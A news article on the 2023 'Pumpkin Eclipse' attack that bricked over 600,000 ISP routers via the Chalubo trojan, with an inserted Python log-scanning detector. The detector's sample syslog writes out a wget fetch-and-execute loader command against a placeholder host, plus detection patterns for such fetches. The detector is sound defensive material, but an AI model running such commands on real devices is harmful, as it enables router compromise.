A Single Attack Disabled Half A Million Routers

In October 2023 unknown attackers disabled hundreds of thousands of Internet routers belonging to a US telecommunications company, according to research since published by Lumen Technologies. More than 600,000 small office/home office (SOHO) routers are estimated to have been rendered useless and taken offline by a destructive cyber attack that cut off users' access to the Internet.

This unexplained event, which took place between October 25 and 27, 2023 and affected a single Internet service provider (ISP) in the US, has been codenamed Pumpkin Eclipse by Lumen's Black Lotus Labs research team.

The attack affected three router models issued by the ISP: the ActionTec T3200, the ActionTec T3260 and a Sagemcom model. "The incident took place over a 72-hour period between October 25-27, rendered the infected devices permanently inoperable, and required a hardware-based replacement," says the Lumen report.

The blackout is significant not least because it led to the abrupt removal of 49% of all modems from the impacted ISP's autonomous system number (ASN) during that window.

While Lumen does not name the ISP, reports at the time pointed to Windstream Communications, which suffered an outage in the same period; affected users reported a "steady red light" on their modems.

Lumen's analysis attributes the sabotage to a commodity remote access trojan (RAT) called Chalubo, a stealthy malware first reported by Sophos in October 2018. The adversary presumably chose it over a custom toolkit to complicate attribution. "Chalubo has payloads designed for all major SOHO/IoT kernels, pre-built functionality to perform DDoS attacks, and can execute any Lua script sent to the bot," the company said.

The initial access method used to breach the routers is still unclear, although it may have involved the abuse of weak credentials or the exploitation of an exposed administrative interface.

Once a foothold is gained, the infection chain drops shell scripts that pave the way for a loader, which in turn retrieves and launches Chalubo from an external server. The destructive Lua script module fetched by the trojan remains unknown.
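As an added illustration, not code from Lumen's report or from the article, the following Python sketch shows how the two things described above, an administrative login reachable from the WAN and a shell-script dropper that fetches and executes a loader from an external host, might surface in a router's syslog. The log format, hostnames and IP addresses are constructed for this example; the regular expressions are deliberately generic and make no claim about Chalubo's actual file names or infrastructure.

```python
"""
Illustrative detector for the SOHO-router infection pattern described
above. Constructed for this example; not Lumen's tooling.
"""
import re
from dataclasses import dataclass

# Constructed sample syslog lines from a hypothetical router (not real data).
SAMPLE_LOG = """\
Oct 25 02:14:07 router login[512]: accepted password for admin from 203.0.113.45 port 52310 (wan)
Oct 25 02:14:09 router sh[530]: echo '#!/bin/sh' > /tmp/.x.sh
Oct 25 02:14:09 router sh[530]: chmod +x /tmp/.x.sh
Oct 25 02:14:10 router sh[531]: wget -q http://203.0.113.9/ldr.bin -O /tmp/ldr && chmod +x /tmp/ldr && /tmp/ldr
Oct 25 02:14:12 router ldr[540]: connecting to 198.51.100.7:443
Oct 25 08:00:01 router cron[77]: run-parts /etc/cron.daily
Oct 25 09:31:44 router login[600]: accepted password for admin from 192.168.1.10 port 41022 (lan)
"""

# RFC 1918, loopback and link-local ranges; anything else is treated as external.
_PRIVATE = re.compile(r"^(10\.|127\.|169\.254\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")

# Hypothetical log shapes assumed for this example.
_LOGIN = re.compile(r"accepted password for (\S+) from (\d{1,3}(?:\.\d{1,3}){3}) port \d+ \((\w+)\)")
_DROP = re.compile(r">\s*(/(?:tmp|var/tmp|dev/shm)/\S+)")
_FETCH = re.compile(r"\b(?:wget|curl|tftp)\b.*?(\d{1,3}(?:\.\d{1,3}){3})")
_EXEC = re.compile(r"(?:[;&|]\s*|\bsh\s+)(/(?:tmp|var/tmp|dev/shm)/\S+)\s*$")

# Stages that together make up the chain: exposed admin login, script dropped
# to a writable temp path, loader fetched from an external host, loader run.
CHAIN = ("wan_admin_login", "script_dropped", "external_fetch", "tmp_exec")


def is_external(ip: str) -> bool:
    """True for any IPv4 address outside private/loopback/link-local space."""
    return not _PRIVATE.match(ip)


@dataclass
class Finding:
    stage: str
    line: str


def scan(log: str) -> list[Finding]:
    """Return one Finding per stage indicator seen in the log text."""
    findings: list[Finding] = []
    for line in log.splitlines():
        m = _LOGIN.search(line)
        if m:
            _user, ip, iface = m.groups()
            # The precondition: the admin interface answered from the WAN side.
            if iface == "wan" or is_external(ip):
                findings.append(Finding("wan_admin_login", line))
            continue
        if _DROP.search(line):
            findings.append(Finding("script_dropped", line))
        m = _FETCH.search(line)
        if m and is_external(m.group(1)):
            findings.append(Finding("external_fetch", line))
        if _EXEC.search(line):
            findings.append(Finding("tmp_exec", line))
    return findings


def chain_detected(findings: list[Finding]) -> bool:
    """True only when every stage of the chain has been observed."""
    seen = {f.stage for f in findings}
    return all(stage in seen for stage in CHAIN)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h.stage:16} {h.line}")
    print("full chain:", chain_detected(hits))
```

The login from 192.168.1.10 on the LAN side is deliberately left unflagged: the point is not that administrative logins are suspicious, but that the interface being reachable from outside the customer's network is the weakness an attacker would lean on. A real deployment would replace the regular expressions with the router's actual log schema and add the stage the script above ignores, the loader's outbound connection.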

A notable aspect of the campaign is its targeting of a single ASN, whereas comparable campaigns have typically targeted a specific router model or a common vulnerability. This raises the possibility that the ISP was deliberately singled out, although the motive remains undetermined. "The event was unprecedented due to the number of units affected, no attack that we can recall has required the replacement of over 600,000 devices," Lumen said.

Lumen   |    Reddit    |    Reuters    |   Hacker News   |   DSL Reports

Image: Unsplash
